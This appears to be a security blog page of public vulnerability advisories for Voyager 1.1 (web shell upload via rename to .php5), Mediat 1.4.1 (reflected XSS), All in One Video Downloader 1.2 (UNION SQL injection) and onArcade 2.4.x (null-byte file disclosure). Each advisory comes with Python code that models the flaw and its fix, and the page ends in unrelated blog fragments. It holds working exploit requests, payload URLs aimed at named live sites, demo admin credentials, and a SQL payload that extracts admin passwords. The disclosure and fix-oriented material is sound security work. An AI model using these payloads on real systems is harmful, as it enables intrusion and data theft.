Voyager 1.1 Shell Upload
# Exploit Title: Voyager 1.1 - Arbitrary File Upload
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Poc Video: https://youtu.be/5GnHbFqRP9M
# Vendor Homepage: https://laravelvoyager.com/
# Software Link: https://github.com/the-control-group/voyager
# Demo Website: http://demo.meteorsa.com/Beemedia
# Demo Admin Panel: http://demo.meteorsa.com/Beemedia/admin
# Demo Admin Credentials:
[email protected]/password
# Version: 1.1.11
# Tested on: WIN7_x68/Linux2.6.32-896.16.1.lve1.4.54.el6.x86_64
# CVE : N/A
# Description
The .htaccess extension restriction on the media directory can be bypassed by uploading a web shell as shell.png and then using the media manager's rename function to change it to shell.php5.
The bug is an extension-filter failure in Laravel/Voyager: the upload is accepted because it arrives as a PNG, and the rename_file endpoint does not re-check the new extension, so the file ends up stored and served as shell.php5.
# Upload Request
POST /Beemedia/admin/media/upload HTTP/1.1
Host: demo.meteorsa.com
Connection: keep-alive
Content-Length: 1203
Accept: application/json
Cache-Control: no-cache
Origin: http://demo.meteorsa.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBfiKW54AxLABftaB
Referer: http://demo.meteorsa.com/Beemedia/admin/media
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6ImhMWXRCQVwvTVlLbTRkYVFpSzZmYWRBPT0iLCJ2YWx1ZSI6InQxUlFvZWFHeFhPUm02dUxMYzBUaVY4aUFXREZwV3JvQ01rb0VJOFdOQ1wvM2tLdWFLZWVORms1YzMyaU9TUDdDIiwibWFjIjoiMDk5YzNkMmNkZmEyMGJmNGM4Njc0NDg3ZjY3OWIyMzBlMGE3MTFhZDI2OWNhNmZmZWI0MjdiZTdmNDViYzg1MSJ9; laravel_session=eyJpdiI6ImNyc3F6UEJONlhtdHBoQXlxbXdOdlE9PSIsInZhbHVlIjoiU0piSGlGN2tETU1oem9KU3RscVlhb0NIWUxTN01UWjhRMnJ2ZXgwRjZ1dlFMQ1FRVnZiUVh1Q1Q5RUhFXC9PM2siLCJtYWMiOiI2NGE4OWFiNTlhOTQ5MjY1ZmZlZjViMzJhZjI1OTk5MDNhZGI5ZmQ2OGQ4NTJiYWI0ZTE4NmE4MjhlYzUyOGFhIn0%3D

------WebKitFormBoundaryBfiKW54AxLABftaB
Content-Disposition: form-data; name="_token"

of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC
------WebKitFormBoundaryBfiKW54AxLABftaB
Content-Disposition: form-data; name="upload_path"

------WebKitFormBoundaryBfiKW54AxLABftaB
Content-Disposition: form-data; name="file"; filename="wv.png"
Content-Type: image/png

------WebKitFormBoundaryBfiKW54AxLABftaB--
# Rename Request
POST /Beemedia/admin/media/rename_file HTTP/1.1
Host: demo.meteorsa.com
Connection: keep-alive
Content-Length: 157
Accept: */*
Origin: http://demo.meteorsa.com
X-CSRF-TOKEN: of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://demo.meteorsa.com/Beemedia/admin/media
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IjU1TXZaVVZoUmFXcFpIcXBWKzE2T2c9PSIsInZhbHVlIjoiV1hLTVwvbk9ZVGRLY3ErUlJoNlwvRlV0TkpIcTJOSFwvQnI2WFltdEFyWTZzZEtRdENreXFLbG1EcFR0WmlONUhkMCIsIm1hYyI6ImM2YzQwZTdiOGYzMDQ1MTE1MjE4MjJhMDkzZTcwYWM1ZmU5ZmY0MmYzZTQ1YjEwODZlOGIzMjA3ZTE4ODZkOGIifQ%3D%3D; laravel_session=eyJpdiI6IksyS2xBczMrdlJ4SHdtVDN0QWhLR1E9PSIsInZhbHVlIjoiNHZvU0wzeEF5MkpcLzlONEFvN09XMXlZSkljbDFJVHo0aE81aGtOSm1QaHBZUmpZaHNndmJmeUZqVFdtS1lycHMiLCJtYWMiOiIzZWI5YjNhOGFkNWU4YjdiZjNkM2FhMDFlODY4MjkyMDk3NjdlZTQ4YjMwYjE1MTEyZDM3YzU1NzAyYjNlYTEyIn0%3D

filename=LWVxh2eHAtZYxigmkPVzSeB5YdclRG5ogwqEp0lA.&new_filename=LWVxh2eHAtZYxigmkPVzSeB5YdclRG5ogwqEp0lA.php5&_token=of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC
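The check that is missing from the rename step, as an added example (not Voyager's or Laravel's own code). It parses the rename_file body captured above, shows a modeled version of the rename handler that accepts any new name, and beside it an allowlist check that refuses the .php5 rename; the allowlist and the script-extension list are assumptions, not taken from the project.

```python
"""Extension allowlist check for a media-manager rename endpoint.

Added example, not Voyager's own code. It models the flaw described above:
the upload step only ever sees shell.png, and the rename step accepts
shell.php5 without looking at the extension. The request body below is the
one captured on the page; the allowlists are assumed.
"""
from __future__ import annotations

import os
import re
from urllib.parse import parse_qs

# Captured rename_file body from the advisory above.
CAPTURED_RENAME_BODY = (
    "filename=LWVxh2eHAtZYxigmkPVzSeB5YdclRG5ogwqEp0lA."
    "&new_filename=LWVxh2eHAtZYxigmkPVzSeB5YdclRG5ogwqEp0lA.php5"
    "&_token=of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC"
)

# Assumed allowlist for a media manager that should only ever hold images.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "webp"}

# Extensions a PHP host commonly executes; listed only to show why a
# blocklist is the weaker fix (anything not on it slips through).
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def parse_rename_request(body: str) -> tuple[str, str]:
    """Return (filename, new_filename) from an x-www-form-urlencoded body."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields["filename"][0], fields["new_filename"][0]


def extensions_of(name: str) -> list[str]:
    """Every extension of a name, lower-cased: 'a.php5' -> ['php5'],
    'shell.php.png' -> ['php', 'png']. Trailing dots/spaces are dropped first."""
    base = os.path.basename(name).rstrip(". ")
    return [p.lower() for p in base.split(".")[1:]]


def rename_vulnerable(filename: str, new_filename: str) -> bool:
    """Modeled vulnerable behaviour: any non-empty name that stays in the
    directory is accepted. The extension is never looked at."""
    return bool(new_filename) and "/" not in new_filename and ".." not in new_filename


def rename_hardened(filename: str, new_filename: str) -> bool:
    """Accept the rename only if the new name is a bare file name with
    exactly one extension and that extension is on the allowlist, so both
    'x.php5' and 'x.php.png' are refused."""
    if not new_filename or new_filename != os.path.basename(new_filename):
        return False
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+", new_filename):
        return False
    exts = extensions_of(new_filename)
    return len(exts) == 1 and exts[0] in ALLOWED_EXTENSIONS


def rename_blocklist_only(filename: str, new_filename: str) -> bool:
    """The weaker fix for contrast: refuse known script extensions only."""
    return not any(e in SCRIPT_EXTENSIONS for e in extensions_of(new_filename))


if __name__ == "__main__":
    old, new = parse_rename_request(CAPTURED_RENAME_BODY)
    print(f"{old!r} -> {new!r}")
    print("vulnerable handler accepts:", rename_vulnerable(old, new))
    print("hardened handler accepts:  ", rename_hardened(old, new))
```

The allowlist version is the one to ship: it also covers extensions the blocklist never heard of (an .shtml or .phar handler added later by the web server config), and it applies the same rule at upload and at rename, which is the property the captured exchange shows was missing.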
# References:
https://packetstormsecurity.com/files/150963/Voyager-1.1-Shell-Upload.html
Mediat 1.4.1 - Cross-site Scripting
# Exploit Title: Mediat 1.4.1 - Cross-site Scripting
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: http://webfairy.net/
# Software Link: https://github.com/WebFairyNet/Mediat
# Demo Website: http://mediat.webfairy.net/
# Version: 1.4
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
A reflected cross-site scripting (XSS) vulnerability was found in the search section of WebFairy Mediat 1.4.1: the `query` parameter of search.html is reflected into the page without output encoding, so a value that closes the surrounding attribute can inject script.
# POC Request:
http://[PATH]/search.html?query="><script>alert('Deyaa')</script>
# Live Target:
http://mediat.webfairy.net/arabic_demo/search.html?query="><script>alert('Deyaa')</script>
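How the payload above works against an attribute-context reflection, and the fix, as an added example (not Mediat's code). It assumes search.html echoes `query` back into the value attribute of the search box; the host name in the sample URL is constructed, the payload is the one from the advisory.

```python
"""Reflected XSS in a search page: vulnerable rendering beside the fix.

Added example, not Mediat's code. The template shape (query echoed into a
value="..." attribute) is an assumption; the payload is the advisory's.
"""
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed URL carrying the advisory's payload (host name is made up).
EXAMPLE_URL = "http://mediat.example/search.html?query=\"><script>alert('Deyaa')</script>"


def query_from_url(url: str) -> str:
    """Extract the query parameter the way the page would receive it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("query", [""])[0]


def render_vulnerable(query: str) -> str:
    """Modeled vulnerable template: raw interpolation into an attribute.
    A leading '">' closes the attribute and the tag, and what follows is
    parsed as markup."""
    return f'<input type="text" name="query" value="{query}">'


def render_fixed(query: str) -> str:
    """Fixed template: HTML-escape with quote=True so that '"' becomes
    &quot; and the attribute can never be closed early. Plain escape()
    without quote=True would leave '"' alone and still be exploitable here."""
    return f'<input type="text" name="query" value="{escape(query, quote=True)}">'


def injects_script(html: str) -> bool:
    """Crude oracle: a literal <script> tag appears in the rendered output."""
    return "<script>" in html


if __name__ == "__main__":
    q = query_from_url(EXAMPLE_URL)
    print("vulnerable:", render_vulnerable(q))
    print("fixed:     ", render_fixed(q))
```

The point the oracle makes is context-specific: escaping for an attribute must neutralise the quote character that delimits it, which is why `quote=True` (or a templating engine's auto-escaping) is required rather than a blanket strip of `<script>`.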
# References:
https://packetstormsecurity.com/files/150962/WebFairy-Mediat-1.4.1-Cross-Site-Scripting.html
All in One Video Downloader 1.2 - SQL Injection
# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
# Google Dork: "developed by Niche Office"
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://nicheoffice.web.tr/
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
# Demo Website: https://aiovideodl.ml/
# Demo Admin Panel: https://aiovideodl.ml/admin/
# Demo Admin Credentials:
[email protected]/123456
# Version: 1.2
# Tested on: WIN7_x68/cloudflare
# CVE : N/A
# POC:
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -
# Exploit:
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
# Live Target:
https://aiovideodl.ml/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
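The injection above recreated offline, as an added example (not the vendor's code). It assumes the page-edit query selects five columns and embeds `id` inside a quoted string, which is what a working five-column UNION with a `2.9'` prefix implies; the database is in-memory SQLite, so MySQL's user()/database()/version() are swapped for sqlite_version() and the tables and rows are constructed.

```python
"""UNION-based SQL injection through a quoted-but-unchecked id parameter.

Added example, not the vendor's code. Recreates the advisory's pattern on
SQLite: the handler quotes id into SQL text, the query returns five columns,
so a five-column UNION SELECT lands attacker-chosen values in the page.
The schema, rows and the sqlite_version() substitution are constructed.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pages(id INTEGER PRIMARY KEY, title TEXT, slug TEXT,
                           body TEXT, status TEXT);
        INSERT INTO pages VALUES (1, 'Home', 'home', 'welcome', 'published');
        INSERT INTO pages VALUES (2, 'About', 'about', 'who we are', 'draft');
        CREATE TABLE admins(id INTEGER, email TEXT, password TEXT);
        INSERT INTO admins VALUES (1, 'admin@example.invalid', 'hash-goes-here');
        """
    )
    return conn


def page_edit_vulnerable(conn: sqlite3.Connection, page_id: str) -> list:
    """Modeled vulnerable handler: id is concatenated into the SQL text."""
    sql = f"SELECT id, title, slug, body, status FROM pages WHERE id='{page_id}'"
    return conn.execute(sql).fetchall()


def page_edit_fixed(conn: sqlite3.Connection, page_id: str) -> list:
    """Fixed handler: bind a placeholder, and since id is numeric, refuse
    anything that is not digits before it reaches the database at all."""
    if not page_id.isdigit():
        return []
    return conn.execute(
        "SELECT id, title, slug, body, status FROM pages WHERE id=?",
        (int(page_id),),
    ).fetchall()


# Adapted from the advisory payload 2.9'+UNION+SELECT+1,2,3,4,concat(...)-- -
# '2.9' matches no real row, so the UNION row is the only one rendered.
UNION_PAYLOAD = "2.9' UNION SELECT 1,2,3,4,sqlite_version()-- -"

# The same primitive pointed at another table: the fingerprint payload
# becomes credential exfiltration with no further bug needed.
EXFIL_PAYLOAD = "2.9' UNION SELECT 1,email,password,4,5 FROM admins-- -"


if __name__ == "__main__":
    db = make_db()
    print("fingerprint:", page_edit_vulnerable(db, UNION_PAYLOAD))
    print("exfil:      ", page_edit_vulnerable(db, EXFIL_PAYLOAD))
    print("fixed:      ", page_edit_fixed(db, UNION_PAYLOAD))
```

The `-- -` tail comments out the closing quote the handler appends; the `2.9` prefix is chosen so the legitimate WHERE matches nothing and the injected row is the one the edit form displays.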
# References:
https://packetstormsecurity.com/files/150955/All-In-One-Video-Downloader-1.2-SQL-Injection.html
onArcade 2.4.x Local File Disclosure
[1] INTRO
onArcade is a PHP CMS for hosting videos and online games. Its template file handler does not sufficiently filter the requested file name, which leads to a Local File Disclosure vulnerability.
[2] Vulnerable Versions
onArcade 2.4.2
onArcade 2.4.1
onArcade 2.4.0
[3] Bug Track
Because the handler treats the .php extension specially, files ending in .php cannot be read directly.
On PHP <= 5.3.4, however, a null byte (%00) appended to the requested name truncates the path and "drops" the extension the handler adds, so .php files can be disclosed as well.
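The null-byte truncation described above, modeled as an added example (not onArcade's code). It assumes a handler that decodes the template parameter and appends a fixed extension under a fixed directory; both the directory and the extension are assumptions. The C-string truncation that PHP <= 5.3.4 exhibited is simulated in `as_seen_by_c_runtime`, since a real Python `open()` rejects paths containing NUL.

```python
"""Null-byte extension truncation in a template loader, and the hardened check.

Added example, not onArcade's code. TEMPLATE_DIR and TEMPLATE_EXT are assumed;
the NUL truncation is a simulation of PHP <= 5.3.4 handing a NUL-terminated
path to the C file API.
"""
import posixpath
from urllib.parse import unquote

TEMPLATE_DIR = "/var/www/onarcade/templates"   # assumed location
TEMPLATE_EXT = ".tpl"                           # assumed forced extension


def build_path_vulnerable(template_param: str) -> str:
    """Modeled vulnerable handler: URL-decode, then blindly append the extension."""
    name = unquote(template_param)
    return f"{TEMPLATE_DIR}/{name}{TEMPLATE_EXT}"


def as_seen_by_c_runtime(path: str) -> str:
    """Simulate a NUL-terminated C string: everything after the first NUL
    byte is invisible to fopen()/open(), which is the PHP <= 5.3.4 behaviour."""
    nul = path.find("\x00")
    return path if nul < 0 else path[:nul]


def build_path_hardened(template_param: str):
    """Reject NUL bytes, then normalise and confine the result to TEMPLATE_DIR.
    Returns None when the request must be refused."""
    name = unquote(template_param)
    if not name or "\x00" in name:
        return None
    candidate = posixpath.normpath(f"{TEMPLATE_DIR}/{name}{TEMPLATE_EXT}")
    if posixpath.commonpath([TEMPLATE_DIR, candidate]) != TEMPLATE_DIR:
        return None
    return candidate


if __name__ == "__main__":
    for param in ("game", "../../config.php", "../../config.php%00"):
        raw = build_path_vulnerable(param)
        print(f"{param:>22} -> C sees {as_seen_by_c_runtime(raw)!r}; "
              f"hardened: {build_path_hardened(param)!r}")
```

Without the null byte the appended `.tpl` makes `config.php.tpl`, which does not exist; with `%00` the runtime stops reading the path at the NUL and opens `config.php` itself, which is why the page says the extension is "dropped". Stripping NUL is necessary but not sufficient: the traversal check is what stops `../../etc/passwd`, which needs no null byte at all.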
[4] POC Video
[5] Links
https://packetstormsecurity.com/files/141792/onArcade-2.4.x-Local-File-Disclosure.html
http://0day.today/exploit/description/27410
Using Cisco Packet Tracer under Ubuntu
Hello World
Hello world,
In my short life, I've gained skills and taken up and left a lot of hobbies.
I have never been interested in blogging or internet communities.
I always saw it as: the more visible you are on the internet, the more easily people can break into your life and privacy.
Finally, I've realized that blogging and sharing your thoughts over the internet may not be that bad, due to the fact that I like computers more than people, so I think it's better to share your thoughts with people over computers.